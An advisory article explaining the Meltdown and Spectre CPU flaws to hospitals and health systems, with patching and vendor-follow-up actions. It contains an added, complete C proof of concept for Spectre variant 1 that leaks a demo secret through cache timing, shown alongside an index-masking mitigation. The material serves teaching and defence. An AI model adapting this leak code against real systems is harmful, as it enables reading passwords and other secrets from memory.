Rumors of an undisclosed security flaw in central processing unit (CPU) hardware have been circulating since November 2017. The flaw has now been confirmed as two critical vulnerabilities known as “Meltdown” and “Spectre,” and the reality is considerably worse than anticipated, with significant implications for hospitals and health systems.
The Threat, in a Scary Nutshell
Without getting too deep into the technical weeds: a modern CPU works on many instructions at once to improve overall performance, but it is limited by how quickly it can fetch data from main memory. To hide that latency, the CPU executes instructions out of order, continuing with later instructions while an earlier one waits on a cache miss. This runs into a challenge whenever the code branches. The CPU cannot yet tell which path the program will take, so it guesses based on its past experience with that branch (branch prediction) and speculatively executes down the guessed path. Once the branch condition is actually evaluated, the processor determines whether it guessed right. If it guessed wrong, the results of the speculatively executed instructions are discarded and execution proceeds down the correct path.
A misprediction should only cost time, but with these two vulnerabilities that is not the case. Discarding the speculative results restores the registers and memory the program can see; it does not restore the state of the CPU cache, so data that the speculative instructions loaded stays cached. An attacker who then measures how quickly each candidate memory location can be read learns which lines were loaded, and from that infers the value the speculative instructions touched. In other words, the cache becomes a covert channel that carries data out of the CPU that the program was never allowed to read. Spectre (CVE-2017-5753, CVE-2017-5715) abuses branch prediction to steer a victim program's speculative execution into reading secrets from its own address space; Meltdown (CVE-2017-5754) abuses out-of-order execution past a privilege check to read kernel memory from an unprivileged process.
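The mechanism just described, as an added example that is not part of the original article: a small C program in the style of the public Spectre variant 1 proof of concept. The victim function performs a bounds check that the branch predictor can be trained to mispredict; the attacker then recovers the out-of-bounds byte by timing reads of a probe array rather than by reading the secret directly. Alongside it is the branchless index masking used as the software mitigation (the same idea as the Linux kernel's array_index_nospec()). The secret string, array layout and cache-hit threshold are constructed assumptions for the demo, and whether the leak succeeds depends on the CPU, compiler flags and system noise, so a garbled result is a tuning problem, not proof that a machine is immune.

```c
/* Added example, not from the original article: Spectre variant 1 (bounds-check
 * bypass, CVE-2017-5753) modelled on the public proof of concept, plus the
 * index-masking hardening. Secret string, array sizes and the cache-hit
 * threshold are constructed for the demo. The side-channel part needs x86-64
 * with GCC or Clang; elsewhere only the portable helpers are built.
 * Build: cc -std=gnu99 -O0 spectre_demo.c   (-O0 keeps the bounds check a real branch) */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__x86_64__)
#include <x86intrin.h>          /* _mm_clflush, __rdtscp */
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif

#define STRIDE 512              /* one probe slot per byte value, each on its own cache lines */
#define CACHE_HIT_THRESHOLD 80  /* cycles; machine-dependent assumption, tune if needed */

unsigned int array1_size = 16;
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t array2[256 * STRIDE];                            /* probe array = the covert channel */
const char *secret = "Demo secret: Meltdown and Spectre"; /* constructed secret */
uint8_t temp = 0;                                        /* keeps the gadget from being optimised away */

/* Vulnerable gadget: on a mispredicted branch array1[x] is read out of bounds and
 * the byte value selects which line of array2 gets pulled into the cache. */
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * STRIDE];
}

/* Hardening: branchless clamp, so even a mispredicted branch cannot use an
 * out-of-bounds index. Returns idx when idx < size, otherwise 0.
 * Relies on arithmetic right shift (GCC/Clang) like the kernel's C fallback. */
size_t nospec_index(size_t idx, size_t size) {
    /* top bit of (idx | (size - 1 - idx)) is set exactly when idx >= size */
    ptrdiff_t mask = ~(ptrdiff_t)(idx | (size - 1 - idx)) >> (sizeof(size_t) * 8 - 1);
    return idx & (size_t)mask;
}

void victim_function_hardened(size_t x) {
    if (x < array1_size) {
        x = nospec_index(x, array1_size);   /* the speculative path now sees index 0, not x */
        temp &= array2[array1[x] * STRIDE];
    }
}

#if HAVE_X86
static uint64_t time_access(volatile uint8_t *p) {
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

/* Recover the byte at array1 + malicious_x without ever reading it architecturally:
 * train the predictor with in-bounds calls, slip in the out-of-bounds index, then
 * time every array2 slot to see which one became cached. */
uint8_t leak_byte(size_t malicious_x) {
    int results[256] = {0};
    for (int tries = 999; tries > 0; tries--) {
        for (int i = 0; i < 256; i++) _mm_clflush(&array2[i * STRIDE]);
        size_t training_x = tries % array1_size;
        for (int j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);                  /* make the bounds check slow to resolve */
            for (volatile int z = 0; z < 100; z++) {}   /* give the flush time to land */
            /* branch-free select: malicious_x on every 6th call, training_x otherwise */
            size_t x = ((j % 6) - 1) & ~0xFFFF;
            x = (x | (x >> 16));
            x = training_x ^ (x & (malicious_x ^ training_x));
            victim_function(x);
        }
        for (int i = 0; i < 256; i++) {
            int mix_i = ((i * 167) + 13) & 255;         /* scrambled order defeats the prefetcher */
            if (time_access(&array2[mix_i * STRIDE]) <= CACHE_HIT_THRESHOLD && mix_i != array1[training_x])
                results[mix_i]++;
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++) if (results[i] > results[best]) best = i;
    return (uint8_t)best;
}
#endif

int main(void) {
#if HAVE_X86
    memset(array2, 1, sizeof array2);                   /* page in the probe array */
    size_t off = (size_t)((const uint8_t *)secret - array1);
    printf("Leaked: ");
    for (size_t i = 0; i < strlen(secret); i++) {
        uint8_t b = leak_byte(off + i);
        putchar((b >= 32 && b < 127) ? b : '?');
    }
    putchar('\n');
#else
    puts("Side-channel demo needs x86-64; only nospec_index() is available here.");
#endif
    return 0;
}
```

The attacker never dereferences the secret itself: the only out-of-bounds read happens inside the victim's mispredicted branch, and its effect survives only as a cache line. The hardened gadget keeps the same bounds check but masks the index arithmetically, so the speculative path touches array1[0] instead of the attacker's address; the Spectre paper's other software mitigation, a serializing instruction such as lfence after the check, stops speculation outright at a higher cost.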
The major problem is the scale of the vulnerability: the affected CPU hardware is everywhere, from the depths of the cloud to the processor in your mobile phone, TV and Xbox. Couple this with the ubiquitous connectivity we all expect these days, and we have a very significant threat.
The general expectation is that, when patches are available, they will have some impact on overall CPU performance. At the most extreme, a complete fix requires re-architected hardware, which would mean replacing CPUs across the organization.
What Does this Mean for Healthcare Organizations?
With the myriad of devices, pumps, servers and workstations in every healthcare organization, the threat is significant, to say the least. Both attacks require attacker-controlled code to run on the target machine, which is why user behaviour matters: at this stage it is critical to reinforce the message to all users that security is paramount, and that clicking unknown links in emails and on web pages is how such code typically arrives (the Spectre whitepaper demonstrates the attack from JavaScript running in a browser). Organizations also need to update and patch every server, workstation and other device that contains an affected CPU, including biomedical devices, diagnostic equipment, treatment equipment, medical monitors, medical laboratory equipment, bedside terminals and environmental management systems, not just IT-managed servers, printers and workstations. Patching should be evaluated against the performance needs of each device type, and patches for medical devices should come through, or be confirmed with, the device vendor. Users will also need to be vigilant about password management: because these vulnerabilities allow secrets held in memory to be read, passwords should be changed after patches are completed.
Longer term, the authors of the Spectre whitepaper argue that instruction set architectures must be updated to include clear guidance about the security properties of the processor, so that software can be built on documented guarantees rather than on observed behaviour. Today, organizations should evaluate all systems with Intel, ARM or AMD CPUs for risk exposure and check with system vendors as to the applicability of the vulnerabilities and any available patches. The two issues do not map onto vendors identically: Spectre affects Intel, AMD and ARM processors, while Meltdown as disclosed affects Intel and some ARM cores, and AMD has stated that its processors are not susceptible to it.
In the meantime, all system administrators and users need to increase their awareness of the threat potential and keep security front and center until these vulnerabilities are fully resolved.
Quick Actions to Take Today
Based on what is known today, the quick actions every healthcare organization should perform or plan to execute in the very near future include:
- Actively monitor operating system vendors' patch sites; patches addressing some of the vulnerabilities are already being released.
- Specifically monitor and test the Meltdown patches being released by Microsoft, Apple, VMware and the various Linux distributions, both for effectiveness and for their performance impact on each workload.
- Ensure anti-virus programs have the latest updates: Microsoft is withholding its January security updates from Windows systems until the installed anti-virus product sets a specific compatibility registry key confirming it works with the patched kernel, so an out-of-date anti-virus product will silently block the fix.
- Actively engage with cloud service providers to confirm strategies for addressing these vulnerabilities and ensure the information provided meets expectations for action items and timeframes.
Spectre, variant 1 (bounds check bypass), CVE-2017-5753 – http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5753
Spectre, variant 2 (branch target injection), CVE-2017-5715 – http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5715
Meltdown, variant 3 (rogue data cache load), CVE-2017-5754 – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754
Original Spectre Whitepaper – https://spectreattack.com/spectre.pdf
Original Meltdown Whitepaper – https://meltdownattack.com/meltdown.pdf